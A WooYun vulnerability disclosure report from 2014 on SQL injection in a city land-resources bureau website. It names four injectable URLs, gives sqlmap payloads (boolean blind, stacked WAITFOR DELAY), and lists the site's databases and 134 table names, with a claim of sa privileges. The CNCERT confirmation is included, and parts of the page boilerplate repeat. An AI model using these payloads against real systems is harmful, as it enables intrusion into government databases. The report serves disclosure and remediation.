某市国土资源局存在多处SQL注射sa权限

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-089260

漏洞标题：某市国土资源局存在多处SQL注射sa权限

漏洞作者： Yang

提交时间：2014-12-30 17:28

修复时间：2015-02-13 17:30

公开时间：2015-02-13 17:30

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-30：细节已通知厂商并且等待厂商处理中
2015-01-04：厂商已经确认，细节仅向厂商公开
2015-01-14：细节向核心白帽子及相关领域专家公开
2015-01-24：细节向普通白帽子公开
2015-02-03：细节向实习白帽子公开
2015-02-13：细节向公众公开

简要描述：

某市国土资源局存在多处SQL注射

详细说明：

仙桃市国土资源局存在多处SQL注射
http://old.xtgtzy.gov.cn/list.asp?classId=10 可能存在sql注入漏洞
http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309 可能存在sql注入漏洞
http://old.xtgtzy.gov.cn/chinese/Bs_DownloadShow.asp?Bs_DownID=104 可能存在sql注入漏洞
http://old.xtgtzy.gov.cn/chinese/Bs_NewsInfo.asp?Action=Co&ID=88 ID=88 可能存在sql注入漏洞
蹭的网卡的要命
演示一处

http://old.xtgtzy.gov.cn/Article-photo.asp?ArticleID=309

---
Place: GET
Parameter: ArticleID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ArticleID=309 AND 8228=8228
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ArticleID=309; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    T<code>

itle: Microsoft SQL Server/Sybase time-based blind
Payload: ArticleID=309 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
</code>

available databases [13]:
[*] [鍦熷湴鍒╃敤鐧昏鏁版嵁搴?014-12]
[*] [鍦熷湴鍒╃敤鐧昏鏁版嵁搴?014-6]
[*] [鍦熷湴鍒╃敤鐧昏鏁版嵁搴?014-8]
[*] hy
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xtgtbs
[*] 鍦熷湴鍒╃敤鐧昏鏁版嵁搴?[*] 鍦熷湴鍒╃敤鐧昏鏁版嵁搴?0131018

Database: hy
[134 tables]
+-------------------+
| BGxxB             |
| Bs_Admin          |
| Bs_Book           |
| Bs_Book_dzxf      |
| Bs_Book_sqgk      |
| Bs_Company        |
| Bs_DownBigClass   |
| Bs_DownSmallClass |
| Bs_Download       |
| Bs_Faq            |
| Bs_Honor          |
| Bs_Img            |
| Bs_Job            |
| Bs_Jobbook        |
| Bs_Links          |
| Bs_NewsCo         |
| Bs_NewsPr         |
| Bs_NewsYe         |
| Bs_OrderList      |
| Bs_PrBigClass     |
| Bs_PrBigClass3    |
| Bs_PrSmallClass   |
| Bs_PrSmallClass3  |
| Bs_Product        |
| Bs_ShopList       |
| Bs_SysData        |
| Bs_User           |
| ClXXb             |
| CyZlB             |
| CyzlType          |
| D99_CMD           |
| D99_Tmp           |
| DhClZtB           |
| DwLdxx            |
| DwUserB           |
| FbZtB             |
| HyHdBpB           |
| JGJC              |
| LdDnZw            |
| LdHdB             |
| LdHdClB           |
| LdHdSxRyB         |
| LdJb              |
| LdJtGj            |
| LdTel             |
| LdTxGjB           |
| LdXgRyXxB         |
| LdXgRyZz          |
| LdXzZw            |
| MmCdB             |
| NB_Column         |
| NB_Content        |
| NB_Content_aa     |
| NB_Ip             |
| NB_Link           |
| NB_Review         |
| NB_System         |
| NB_Top            |
| RyZW              |
| RyZc              |
| RyZzmm            |
| SGxxB             |
| SjJgZryxxB        |
| Sjksxxb           |
| Tab_Db            |
| Tab_Dbsy1         |
| Tab_Dw            |
| Tab_Filelb        |
| Tab_JsB           |
| Tab_JsQx          |
| Tab_NoFile        |
| Tab_Title         |
| Tab_UserLog       |
| Tab_UserQx        |
| Tab_UserQx11      |
| Tab_Users         |
| Tab_UsersJs       |
| Tab_Xzqh          |
| Tab_YesFile       |
| Tab_ZL            |
| Tab_module        |
| Tab_ofxx          |
| Tab_xxHfb         |
| Tab_xxb           |
| Tab_xxlb          |
| Unit_Fl           |
| VIEW1             |
| Vote              |
| Vote_cj           |
| Vote_dj           |
| Vote_dj2          |
| Vote_js           |
| Vote_jyxx         |
| Vote_sfxz         |
| Vote_sfxz1        |
| Vote_txql         |
| Vote_xzsp         |
| Vote_zw           |
| XGxxB             |
| XjJgUserB         |
| XjLdTel           |
| XjLdXgRyXxB       |
| XjZryxxB          |
| Xjksxxb           |
| XjldxxB           |
| ZBZBB             |
| ZbLdYjB           |
| ZbLxB             |
| ZryxxB            |
| Zy_xxHfb          |
| Zy_xxb            |
| Zy_xxlb           |
| <%NoDown%>        |
| counters          |
| dtproperties      |
| email             |
| friend            |
| gwclb             |
| jjcd              |
| ksxxb             |
| ldxxB             |
| maildefault       |
| sbdata            |
| tddj              |
| vote_tddj         |
| vote_xk           |
| webcount          |
| xxfb              |
| zzbsGzzz          |
| 浠栭」鏉冨埄璇佷功            |
| 鍥芥湁鍦熷湴10                |
| 鍥芥湁鍦熷湴110               |
| 鍦熷湴鐧昏淇℃伅            |
| 闆嗕綋鍦熷湴10                |
+-------------------+

sa权限

漏洞证明：

其他库不是不跑，是网速太卡。。
网速不好，。瞅瞅这

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-01-04 14:46

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给湖北分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-089260

漏洞标题：某市国土资源局存在多处SQL注射sa权限

相关厂商：cncert国家互联网应急中心

漏洞作者： Yang

提交时间：2014-12-30 17:28

修复时间：2015-02-13 17:30

公开时间：2015-02-13 17:30

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-089260

漏洞标题：某市国土资源局存在多处SQL注射sa权限

相关厂商：cncert国家互联网应急中心

漏洞作者： Yang

提交时间：2014-12-30 17:28

修复时间：2015-02-13 17:30

公开时间：2015-02-13 17:30

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-089260"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Yang@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：